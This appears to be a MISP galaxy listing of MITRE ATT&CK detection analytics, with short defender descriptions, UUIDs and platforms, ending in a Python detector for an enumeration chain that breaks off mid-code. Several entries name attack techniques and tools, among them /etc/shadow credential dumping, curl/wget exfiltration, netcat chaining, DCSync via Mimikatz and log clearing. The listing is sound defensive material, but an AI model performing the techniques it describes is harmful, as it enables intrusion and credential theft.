Correlate suspicious registry modifications to known COM object CLSIDs with subsequent DLL loads or unexpected binary execution paths. Detect placement of COM CLSID entries under HKEY_CURRENT_USER\Software\Classes\CLSID\ overriding default HKLM paths. Flag anomalous DLL loads traced back to hijacked COM registry changes.

Internal MISP references

UUID cda93955-7500-49dd-9150-94bedae91d22 which can be used as unique global reference for Analytic 1323 - AN1323 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1323
mitre_platforms ['Windows']

Analytic 1423 - AN1423

Access and retrieval of container service account tokens followed by unauthorized API requests using those tokens to interact with the Kubernetes API server or internal services.

Internal MISP references

UUID 78821450-c84f-498f-abf2-b43211fa4218 which can be used as unique global reference for Analytic 1423 - AN1423 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1423
mitre_platforms ['Containers']

Analytic 1432 - AN1432

Identifies CLI interpreter access (e.g., Cisco IOS, Juniper JUNOS) via enable mode or scripting-capable sessions used by uncommon accounts or from unknown IPs.

Internal MISP references

UUID 9e03886b-155c-4483-9d92-dad6a7d8543b which can be used as unique global reference for Analytic 1432 - AN1432 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1432
mitre_platforms ['Network Devices']

Analytic 1324 - AN1324

Detection of token duplication and impersonation attempts by correlating suspicious command-line executions (e.g., runas) with API calls to DuplicateToken, DuplicateTokenEx, ImpersonateLoggedOnUser, or SetThreadToken. The chain includes the initial command execution or in-memory API invocation → token handle duplication or thread token assignment → a new or existing process assuming the impersonated user's context.

Internal MISP references

UUID b76aeebb-3915-48ed-ac35-6af54c88c3bb which can be used as unique global reference for Analytic 1324 - AN1324 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1324
mitre_platforms ['Windows']

Analytic 1243 - AN1243

Monitor kernel module load/unload activity via modprobe, insmod, rmmod, or direct manipulation of /lib/modules. Correlate with installation of kernel headers, compilation commands, or downloads of .ko files. Detect anomalies in unsigned module loading or repeated module load attempts under non-root users.

Internal MISP references

UUID c221d379-1dcb-4ca7-908e-59f6ed7afaed which can be used as unique global reference for Analytic 1243 - AN1243 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1243
mitre_platforms ['Linux']

Analytic 1342 - AN1342

Failed authentication attempts across user mailboxes using identical or common passwords (e.g., OWA brute-force attempts).

Internal MISP references

UUID cfffc717-79f1-4aea-9e68-475ef52db11d which can be used as unique global reference for Analytic 1342 - AN1342 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1342
mitre_platforms ['Office Suite']

Analytic 1234 - AN1234

Adversaries attempt to read sensitive files such as /etc/passwd and /etc/shadow for credential dumping. This may involve access to the files directly via command-line utilities (e.g., cat, less), creation of backup copies, or parsing through post-exploitation frameworks. Multi-event correlation includes elevated process execution, file access/read on sensitive paths, and anomalous read behaviors tied to non-root or unusual users.

Internal MISP references

UUID d6166e3d-2e29-4097-9fb4-c66ce0616897 which can be used as unique global reference for Analytic 1234 - AN1234 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1234
mitre_platforms ['Linux']

Analytic 1532 - AN1532

Use of hcitool, bluetoothctl, or rfcomm to initialize Bluetooth connection paired with recent file reads by the same user or session.

Internal MISP references

UUID 01588556-4b25-4418-b746-9bca0279be2c which can be used as unique global reference for Analytic 1532 - AN1532 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1532
mitre_platforms ['Linux']

Analytic 1253 - AN1253

A process (often after stealing/creating a token) calls CreateProcessWithTokenW/CreateProcessAsUserW or uses runas to spawn a new process whose security context (SID/LogonId/IntegrityLevel) differs from its parent. Chain: (1) suspicious command/API → (2) privileged handle or token duplication/open → (3) new child process running as another user / higher integrity → (4) optional follow-on privileged/lateral actions.

Internal MISP references

UUID 0929e9c5-2e1a-4cc1-a9c5-df081b180201 which can be used as unique global reference for Analytic 1253 - AN1253 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1253
mitre_platforms ['Windows']

Analytic 1352 - AN1352

Detection of adversary attempts to enumerate containers, pods, nodes, and related resources within containerized environments. Defenders may observe anomalous API calls to Docker or Kubernetes (e.g., 'docker ps', 'kubectl get pods', 'kubectl get nodes'), unusual account activity against the Kubernetes dashboard, or unexpected queries against container metadata endpoints. These events should be correlated with user context and network activity to reveal resource discovery attempts.

Internal MISP references

UUID 3947e311-cada-4eab-b4fd-1ea1f3fc3485 which can be used as unique global reference for Analytic 1352 - AN1352 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1352
mitre_platforms ['Containers']

Analytic 1325 - AN1325

Enumeration of services via native CLI tools (e.g., sc query, tasklist /svc, net start) or API calls via PowerShell and WMI.

Internal MISP references

UUID 475313b7-c26f-44f6-a8f3-09b57f03fcd8 which can be used as unique global reference for Analytic 1325 - AN1325 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1325
mitre_platforms ['Windows']

Analytic 1235 - AN1235

Adversary uses built-in tools like 'net user /add', PowerShell, or WMI to create a local user. Sequence: Account creation event (4720) follows process creation of a suspicious executable (e.g., powershell.exe or net.exe).

Internal MISP references

UUID 4e4c318b-5da0-46f7-aed2-d37828e4831b which can be used as unique global reference for Analytic 1235 - AN1235 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1235
mitre_platforms ['Windows']

Analytic 1523 - AN1523

Series of failed logins from loginwindow or sshd with repeated usernames or password prompts.

Internal MISP references

UUID 53336c8f-a218-462a-b97c-aac07cf96077 which can be used as unique global reference for Analytic 1523 - AN1523 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1523
mitre_platforms ['macOS']

Analytic 1623 - AN1623

Adversary compromises a Linux-based web server and modifies hosted web files by exploiting upload vulnerabilities, remote code execution, or replacing index.html via SSH/webshell.

Internal MISP references

UUID 1affb8e9-25b4-49c1-b290-687e9696fa83 which can be used as unique global reference for Analytic 1623 - AN1623 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1623
mitre_platforms ['Linux']

Analytic 1326 - AN1326

Execution of service management commands like systemctl list-units, service --status-all, or direct reading of /etc/init.d.

Internal MISP references

UUID 20879a60-f16c-4a90-bd71-2c8865c99481 which can be used as unique global reference for Analytic 1326 - AN1326 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1326
mitre_platforms ['Linux']

Analytic 1263 - AN1263

Rapid login failures across different users from a single IP address, targeting SSH or PAM login with distinct username-password pairs.

Internal MISP references

UUID 95d381e5-f2d6-4164-9917-57f9b070333b which can be used as unique global reference for Analytic 1263 - AN1263 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1263
mitre_platforms ['Linux']

Analytic 1632 - AN1632

Detects unauthorized invocation of replication operations (DCSync) via Directory Replication Service (DRS), often executed by threat actors using Mimikatz or similar tools from non-DC endpoints.

Internal MISP references

UUID 9a68f1a7-65f0-4eef-a711-888bccbeb0d5 which can be used as unique global reference for Analytic 1632 - AN1632 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1632
mitre_platforms ['Windows']

Analytic 1236 - AN1236

Local user accounts are created via binaries like 'useradd', 'adduser', or by editing passwd/shadow. Behavior chain includes execution of user management binaries or modification of user database files.

Internal MISP references

UUID ee065e5f-5a04-49bd-b2b6-33b404ac37c7 which can be used as unique global reference for Analytic 1236 - AN1236 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1236
mitre_platforms ['Linux']

Analytic 1362 - AN1362

Monitor server and endpoint logs for unusual outbound network connections to cryptocurrency nodes, unauthorized scripts accessing financial systems, or automation targeting payment file formats. Detect curl/wget activity aimed at exfiltrating transaction data or credentials from financial apps.

Internal MISP references

UUID efdca1e1-5a4a-4039-99ab-1cdb7e50e52c which can be used as unique global reference for Analytic 1362 - AN1362 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1362
mitre_platforms ['Linux']

Analytic 1237 - AN1237

Account creation using 'dscl -create' or via GUI tools. Detection involves command execution and file changes to the local directory services database.

Internal MISP references

UUID 45e8fdaf-60cc-46db-a9fd-5dc18c8db6bb which can be used as unique global reference for Analytic 1237 - AN1237 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1237
mitre_platforms ['macOS']

Analytic 1372 - AN1372

Detection of adversaries disabling cloud monitoring and logging agents such as CloudWatch, Google Cloud Monitoring, or Azure Monitor by API calls or agent process termination.

Internal MISP references

UUID 5d329e39-a38b-47cd-8d3d-fa7515280fd7 which can be used as unique global reference for Analytic 1372 - AN1372 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1372
mitre_platforms ['IaaS']

Analytic 1273 - AN1273

Hidden file system use through APFS containers or custom plist configuration. Defender view: anomalous use of hdiutil or diskutil to attach hidden partitions, modification of plist entries tied to system volumes, or suspicious raw disk access.

Internal MISP references

UUID 82908b5f-fa84-4420-bb1c-cc77e12e9d3c which can be used as unique global reference for Analytic 1273 - AN1273 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1273
mitre_platforms ['macOS']

Analytic 1327 - AN1327

Discovery via launchctl commands, or process enumeration using ps aux | grep com.apple. to identify daemons and services.

Internal MISP references

UUID 8f654b08-222f-4fc0-83cc-ab871e290d1e which can be used as unique global reference for Analytic 1327 - AN1327 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1327
mitre_platforms ['macOS']

Analytic 1723 - AN1723

Mobile security products can often alert the user if their device is vulnerable to known exploits.

Internal MISP references

UUID 52a370ec-dca2-45e0-bba7-7384816945e8 which can be used as unique global reference for Analytic 1723 - AN1723 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1723
mitre_platforms ['Android']

Analytic 1732 - AN1732

Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is regarded as undetectable to the user.

Internal MISP references

UUID 6c776c7a-0e2f-4963-9485-aa90149ae68e which can be used as unique global reference for Analytic 1732 - AN1732 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1732
mitre_platforms ['iOS']

Analytic 1382 - AN1382

Detects GCC or Clang invoked on suspicious file paths (e.g., /tmp/, ~/Downloads) with output to executable binaries, followed by execution or outbound traffic from these binaries.

Internal MISP references

UUID 774d555e-b94b-4dbd-bc3b-fb60d55e6e2d which can be used as unique global reference for Analytic 1382 - AN1382 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1382
mitre_platforms ['Linux']

Analytic 1283 - AN1283

Detection of default account usage such as Guest or Administrator performing interactive or remote logons on systems outside of installation or maintenance windows.

Internal MISP references

UUID 7a3dd710-39a7-4327-8d3b-150c50b2c680 which can be used as unique global reference for Analytic 1283 - AN1283 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1283
mitre_platforms ['Windows']

Analytic 1238 - AN1238

Account created using esxcli commands. Sequence includes esxcli execution and successful modification to account DB.

Internal MISP references

UUID b7a63a7c-e8c2-4a25-becf-299ea45996e5 which can be used as unique global reference for Analytic 1238 - AN1238 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1238
mitre_platforms ['ESXi']

Analytic 1328 - AN1328

Spike in object access from a new IAM user or role followed by data exfiltration to external IPs.

Internal MISP references

UUID d9a1ace1-6307-4db7-925f-67057361e66a which can be used as unique global reference for Analytic 1328 - AN1328 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1328
mitre_platforms ['IaaS']

Analytic 1832 - AN1832

Application vetting services could look for usage of the READ_PRIVILEGED_PHONE_STATE Android permission. This could indicate that non-system apps are attempting to access information that they do not have access to.

Internal MISP references

UUID 0d358eda-4f7e-462e-8201-96d8a661001d which can be used as unique global reference for Analytic 1832 - AN1832 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1832
mitre_platforms ['iOS']

Analytic 1823 - AN1823

Usage of insecure or malicious third-party libraries could be detected by application vetting services. Malicious software development tools could be detected by enterprises that deploy endpoint protection software on computers that are used to develop mobile apps.

Internal MISP references

UUID ffcee6e2-02dd-4053-92a3-8600dd70445e which can be used as unique global reference for Analytic 1823 - AN1823 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1823
mitre_platforms ['Android']

Analytic 1329 - AN1329

OAuth token granted to an external app followed by download of high-volume files in OneDrive/Google Drive.

Internal MISP references

UUID 8226ce94-1f5b-4ab0-b0bc-92f1d225eaa4 which can be used as unique global reference for Analytic 1329 - AN1329 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1329
mitre_platforms ['SaaS']

Analytic 1239 - AN1239

Account created in a running container (e.g., via 'useradd' or by modifying /etc/passwd directly). Detectable via runtime telemetry (e.g., Falco or eBPF hooks).

Internal MISP references

UUID ac204e03-5c8c-4e29-929c-780145a98669 which can be used as unique global reference for Analytic 1239 - AN1239 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1239
mitre_platforms ['Containers']

Analytic 1293 - AN1293

Defenders may observe adversary attempts to patch system images by monitoring for anomalous file transfers (TFTP, SCP, FTP) of image files, unauthorized CLI commands altering boot system variables, integrity check mismatches between running and baseline OS images, and runtime memory manipulation attempts. Suspicious sequences include uploading a new image, modifying boot parameters, and subsequent reload/reboot of the device. In-memory patching attempts may manifest as debug commands or boot loader manipulation inconsistent with normal administrative activity.

Internal MISP references

UUID bf64c48c-5834-426c-be21-6db0efbc7909 which can be used as unique global reference for Analytic 1293 - AN1293 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1293
mitre_platforms ['Network Devices']

Analytic 1392 - AN1392

Detects unexpected encrypted egress traffic from management services (e.g., hostd) or guest VMs utilizing symmetric encryption without traditional protocols (e.g., FTP with embedded AES ciphertext).

Internal MISP references

UUID d73a1356-7f4f-4f54-afca-437736e5f53c which can be used as unique global reference for Analytic 1392 - AN1392 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1392
mitre_platforms ['ESXi']

Analytic 1244 - AN1244

Detect user-initiated kextload commands or modifications to /Library/Extensions. Correlate with changes to KextPolicy database or unauthorized developer signing identities. Alert on attempts to disable SIP or load legacy extensions from unsigned sources.

Internal MISP references

UUID 092689c7-be8a-4d11-99d8-7dd96afa938d which can be used as unique global reference for Analytic 1244 - AN1244 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1244
mitre_platforms ['macOS']

Analytic 1442 - AN1442

Detects AppleScript or Objective-C usage to generate fake authentication windows (e.g., using display dialog or NSAlert) from user-launched or persistence-related processes.

Internal MISP references

UUID 3b327a8f-0ea3-4848-b34a-58029e5edf57 which can be used as unique global reference for Analytic 1442 - AN1442 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1442
mitre_platforms ['macOS']

Analytic 1424 - AN1424

Token retrieval from instance metadata endpoints such as AWS IMDS or Azure IMDS, followed by API usage using the obtained token from non-standard applications.

Internal MISP references

UUID 70f6482e-e93b-45a5-9b8c-ba7fd0c8220a which can be used as unique global reference for Analytic 1424 - AN1424 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1424
mitre_platforms ['IaaS']

Analytic 1245 - AN1245

Defenders can identify PowerShell profile-based persistence by correlating file creation or modification in known profile locations with subsequent PowerShell process launches that do not use the -NoProfile flag. Profile scripts loading unusual modules or launching external programs, particularly under elevated contexts, are suspicious and may represent adversary persistence or privilege escalation.

Internal MISP references

UUID 298d1a46-ec12-4cd2-acce-7e0f849c384d which can be used as unique global reference for Analytic 1245 - AN1245 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1245
mitre_platforms ['Windows']

Analytic 1254 - AN1254

Anomalous use of ICMP or UDP by non-network service processes for data exfiltration or remote control, especially if traffic bypasses proxy infrastructure or shows unusual flow patterns.

Internal MISP references

UUID 4412fb07-9a44-49de-80af-8746b0be3865 which can be used as unique global reference for Analytic 1254 - AN1254 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1254
mitre_platforms ['Windows']

Analytic 1452 - AN1452

Process creation and command-line execution of native system discovery utilities such as systeminfo, hostname, wmic, or use of PowerShell/WMI for system enumeration.

Internal MISP references

UUID 54bfcc92-e04c-4eac-9aa2-c10b7574088c which can be used as unique global reference for Analytic 1452 - AN1452 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1452
mitre_platforms ['Windows']

Analytic 1542 - AN1542

Monitor CLI 'reload' commands issued without scheduled maintenance, and correlate to TACACS+/AAA logs for privilege validation.

Internal MISP references

UUID 9c70d5b3-8748-4f88-8fd8-95f79c73d250 which can be used as unique global reference for Analytic 1542 - AN1542 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1542
mitre_platforms ['Network Devices']

Analytic 1425 - AN1425

Unusual OAuth app registration followed by user-granted OAuth tokens and subsequent high-privilege resource access via those tokens.

Internal MISP references

UUID a064fdd2-4293-4aff-a91b-e06ac8bf9262 which can be used as unique global reference for Analytic 1425 - AN1425 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1425
mitre_platforms ['Identity Provider']

Analytic 1524 - AN1524

Multiple failed sign-in attempts from external sources across many users followed by success from the same IP.

Internal MISP references

UUID f525a464-a4e5-40fb-831a-162af2f232e7 which can be used as unique global reference for Analytic 1524 - AN1524 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1524
mitre_platforms ['Identity Provider']

Analytic 1246 - AN1246

Detection correlates abnormal installation or modification of root or code-signing certificates, creation/modification of suspicious registry keys for trust providers, and unusual module loads from non-standard locations. Identifies unsigned or improperly signed executables bypassing trust prompts, combined with persistence artifacts.

Internal MISP references

UUID 35b0b263-f85d-4e6a-8bcb-5e2c1a9da080 which can be used as unique global reference for Analytic 1246 - AN1246 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1246
mitre_platforms ['Windows']

Analytic 1462 - AN1462

Execution of files with reversed filename extensions using Unicode RTLO character. Frequently used to deceive Gatekeeper and users in Safari or Mail-based phishing.

Internal MISP references

UUID 667326a7-1f31-4ef1-92c1-6cb5241dadcf which can be used as unique global reference for Analytic 1462 - AN1462 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1462
mitre_platforms ['macOS']

Analytic 1642 - AN1642

Suspicious access to password manager vaults (KeePassXC, gnome-keyring, pass) via memory scraping or unauthorized file reads. Detects unusual command execution involving gdb/strace attached to password manager processes.

Internal MISP references

UUID 93fd8592-d8ce-4b5e-b095-71cd66062298 which can be used as unique global reference for Analytic 1642 - AN1642 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1642
mitre_platforms ['Linux']

Analytic 1624 - AN1624

Adversary modifies web-facing content on macOS via web development environments like MAMP or misconfigured Apache instances, typically with access to the hosting user account or via persistence tools.

Internal MISP references

UUID c9b3d194-843a-4f65-ad8b-4b3192571fc5 which can be used as unique global reference for Analytic 1624 - AN1624 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1624
mitre_platforms ['macOS']

Analytic 1426 - AN1426

Use of OAuth tokens by third-party apps to access user mail, calendar, or SharePoint resources where the token was granted recently or via spearphishing.

Internal MISP references

UUID da365d5b-c955-46f6-99c2-cd57a3560a57 which can be used as unique global reference for Analytic 1426 - AN1426 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1426
mitre_platforms ['Office Suite']

Analytic 1264 - AN1264

Burst of failed authentications with rotating usernames against loginwindow or a remote management service using reused breached credentials.

Internal MISP references

UUID e2f104ac-b21a-4c48-8987-3e0ad73997df which can be used as unique global reference for Analytic 1264 - AN1264 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1264
mitre_platforms ['macOS']

Analytic 1427 - AN1427

Programmatic access to user content via stolen access tokens in platforms like Slack, GitHub, Google Workspace — especially from new IPs, apps, or excessive resource access.

Internal MISP references

UUID 0677b819-0586-454c-9f4d-c861ccaf1b73 which can be used as unique global reference for Analytic 1427 - AN1427 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1427
mitre_platforms ['SaaS']

Analytic 1247 - AN1247

Detection monitors extended attribute manipulation (xattr) to strip quarantine or trust metadata, anomalous installation of root certificates in /etc/ssl or /usr/local/share/ca-certificates, and unauthorized modification of system trust stores. Correlates with unexpected process execution involving package managers or custom certificate utilities.

Internal MISP references

UUID 06ec22c9-b32f-49bc-81cc-ed5cee622493 which can be used as unique global reference for Analytic 1247 - AN1247 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1247
mitre_platforms ['Linux']

Analytic 1472 - AN1472

Detects behavioral sequence where an adversary gains elevated privileges and clears event logs using native binaries (e.g., wevtutil), PowerShell, or direct file deletion of .evtx files.

Internal MISP references

UUID 6482fa33-322b-47e4-a9f7-c2bcc92d132a which can be used as unique global reference for Analytic 1472 - AN1472 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1472
mitre_platforms ['Windows']

Analytic 1274 - AN1274

Detects anomalous network traffic on UDP 5355 (LLMNR) and UDP 137 (NBT-NS) combined with unauthorized SMB relay attempts, registry modifications re-enabling multicast name resolution, or suspicious service creation indicative of adversary-in-the-middle credential interception.

Internal MISP references

UUID eb031858-bf91-476e-8248-2c54ef0f0864 which can be used as unique global reference for Analytic 1274 - AN1274 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1274
mitre_platforms ['Windows']

Analytic 1742 - AN1742

Command-line activities can potentially be detected through Mobile Threat Defense (MTD) integrations with lower-level OS APIs. Such integrations could grant MTD agents access to running and newly created processes and their parameters, potentially detecting unwanted or malicious shells. Application vetting services could detect the invocations of methods that could be used to execute shell commands.(Citation: Samsung Knox Mobile Threat Defense)

Internal MISP references

UUID 77c81bf1-beef-429a-a426-a716b489383a which can be used as unique global reference for Analytic 1742 - AN1742 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1742
mitre_platforms ['iOS']

Analytic 1724 - AN1724

Mobile security products can often alert the user if their device is vulnerable to known exploits.

Internal MISP references

UUID 81a49b9b-c8cf-438c-bea0-e09149f50b34 which can be used as unique global reference for Analytic 1724 - AN1724 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1724
mitre_platforms ['iOS']

Analytic 1482 - AN1482

1) pkg/notarization installs from atypical sources or with Gatekeeper/AMFI warnings; 2) new Mach-O written into /Applications or ~/Library paths or substitution of signed components; 3) first run from installer spawns unsigned children or exfil.

Internal MISP references

UUID 779b2e27-9318-46a3-aeec-765f5fb09de3 which can be used as unique global reference for Analytic 1482 - AN1482 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1482
mitre_platforms ['macOS']

Analytic 1248 - AN1248

Detection monitors modification of code signing attributes, Gatekeeper/quarantine flags, and insertion of new trust certificates via security add-trusted-cert. Identifies adversary use of xattr to strip quarantine flags from downloaded binaries. Correlates with abnormal module loads bypassing SIP protections.

Internal MISP references

UUID 94340be7-068e-446a-bca2-d414b66912fc which can be used as unique global reference for Analytic 1248 - AN1248 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1248
mitre_platforms ['macOS']

Analytic 1284 - AN1284

Monitoring for SSH logins from default accounts such as 'root', especially when login is via password and not key-based authentication.

Internal MISP references

UUID c804a181-f0be-41dd-81ce-95e0a3e5245d which can be used as unique global reference for Analytic 1284 - AN1284 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1284
mitre_platforms ['Linux']

Analytic 1428 - AN1428

Detects the execution of scripting or command interpreters (e.g., powershell.exe, cmd.exe, wscript.exe) outside expected administrative time windows or from abnormal user contexts, often followed by encoded/obfuscated arguments or secondary execution events.

Internal MISP references

UUID fee823fd-f31e-4898-820e-322e49574438 which can be used as unique global reference for Analytic 1428 - AN1428 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1428
mitre_platforms ['Windows']

Analytic 1824 - AN1824

Application vetting services could detect the use of insecure or malicious third-party libraries. Malicious software development tools could be detected by enterprises that deploy endpoint protection software on the computers used to develop mobile apps.

Internal MISP references

UUID 7a209f60-7f43-407f-b5bd-7877e10222ee which can be used as unique global reference for Analytic 1824 - AN1824 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1824
mitre_platforms ['iOS']

Analytic 1842 - AN1842

The user can examine the list of all installed applications, including those with a suppressed icon, in the device settings. If the user is redirected to the device settings when tapping an application’s icon, they should inspect the application to ensure it is genuine. Application vetting services could potentially detect the usage of APIs intended for suppressing the application’s icon.

Internal MISP references

UUID 944c3eaa-2809-4db3-ac7c-d1868e205793 which can be used as unique global reference for Analytic 1842 - AN1842 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1842
mitre_platforms ['Android']

Analytic 1249 - AN1249

Defenders may observe suspicious SNMP MIB enumeration through abnormal queries for large sets of OIDs, repeated SNMP GETBULK/GETNEXT requests, or queries originating from non-administrative IP addresses. Anomalous use of community strings, authentication failures, or enumeration activity outside maintenance windows may also indicate attempts to dump MIB contents. Correlation across syslog, NetFlow, and SNMP audit data can reveal chains of behavior such as repeated authentication failures followed by successful large-scale OID retrieval.

Internal MISP references

UUID 282d9231-942a-4b97-875c-659aa2c41971 which can be used as unique global reference for Analytic 1249 - AN1249 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1249
mitre_platforms ['Network Devices']

Analytic 1429 - AN1429

Detects use of shell interpreters (e.g., bash, sh, python, perl) initiated by users or processes not normally executing them, especially when chaining suspicious utilities like netcat, curl, or ssh.

Internal MISP references

UUID 3b02d81a-8684-4fc8-8364-127f30359282 which can be used as unique global reference for Analytic 1429 - AN1429 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1429
mitre_platforms ['Linux']

Analytic 1942 - AN1942

Monitor for suspicious network traffic that could be indicative of adversary reconnaissance, such as rapid successions of requests indicative of web crawling and/or large quantities of requests originating from a single source (especially if the source is known to be associated with an adversary). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.

Internal MISP references

UUID 5c5afe0d-b967-49ac-8c3e-eeb9cc01667d which can be used as unique global reference for Analytic 1942 - AN1942 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1942
mitre_platforms ['PRE']

Analytic 1492 - AN1492

Ephemeral or unauthorized container instantiation using public images (e.g., from DockerHub) that initiate high CPU usage shortly after startup. Often scheduled via Kubernetes or Docker socket abuse.

Internal MISP references

UUID 7ac026eb-9a3b-49fe-b7ec-7261cb6d6191 which can be used as unique global reference for Analytic 1492 - AN1492 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1492
mitre_platforms ['Containers']

Analytic 1294 - AN1294

Untrusted processes creating outbound TLS/HTTPS connections with malformed certificates or header fields, often mismatched with target service behavior. Detects protocol impersonation attempts via traffic metadata analysis and host process lineage.

Internal MISP references

UUID bcf48294-2388-4ae6-be22-f9038c54e1db which can be used as unique global reference for Analytic 1294 - AN1294 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1294
mitre_platforms ['Windows']

Analytic 1525 - AN1525

Authentication failures on the SNMP (bad community string or SNMPv3 USM failure), Telnet, or SSH management interfaces, typically reflected in device logs or syslog events.

Internal MISP references

UUID 13556e3f-80f0-4aac-83f0-0d6c706e76ff which can be used as unique global reference for Analytic 1525 - AN1525 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1525
mitre_platforms ['Network Devices']

Analytic 1552 - AN1552

Linux environmental validation behavioral chain: (1) Intensive system enumeration through command execution (uname, hostname, ifconfig, lsblk, mount), (2) File system reconnaissance targeting specific paths, network configurations, and installed packages, (3) Process and user enumeration to validate target environment characteristics, (4) Conditional script execution or binary activation based on environmental criteria, (5) Network connectivity validation and external IP address resolution for geolocation verification
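To show how the five stages above can be correlated into one alert, here is an added example (written for this page, not MITRE's analytic logic or any product's rule) in Python. Each stage is recognised by a regular expression over the command line; the detector groups constructed process events by host and session and alerts once when at least four distinct stages occur within ten minutes. The stage patterns, thresholds and sample events are assumptions for the example.

```python
import re
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)
MIN_STAGES = 4   # assumption: four of the five stages inside the window is a strong enough chain

# One regex per stage of the AN1552 chain; patterns are anchored on the command name where it matters.
STAGES = [
    (1, "system enumeration",
     re.compile(r"^(uname|hostname|ifconfig|ip (a|addr|link)|lsblk|mount|lscpu|dmidecode)\b")),
    (2, "file system and package reconnaissance",
     re.compile(r"^(cat /etc/(os-release|issue|resolv\.conf)|ls (/etc|/opt|/var)|dpkg -l|rpm -qa|find / )")),
    (3, "process and user enumeration",
     re.compile(r"^(ps |who\b|w\b|id\b|whoami|last\b|getent passwd)")),
    (4, "conditional execution from a staging path",
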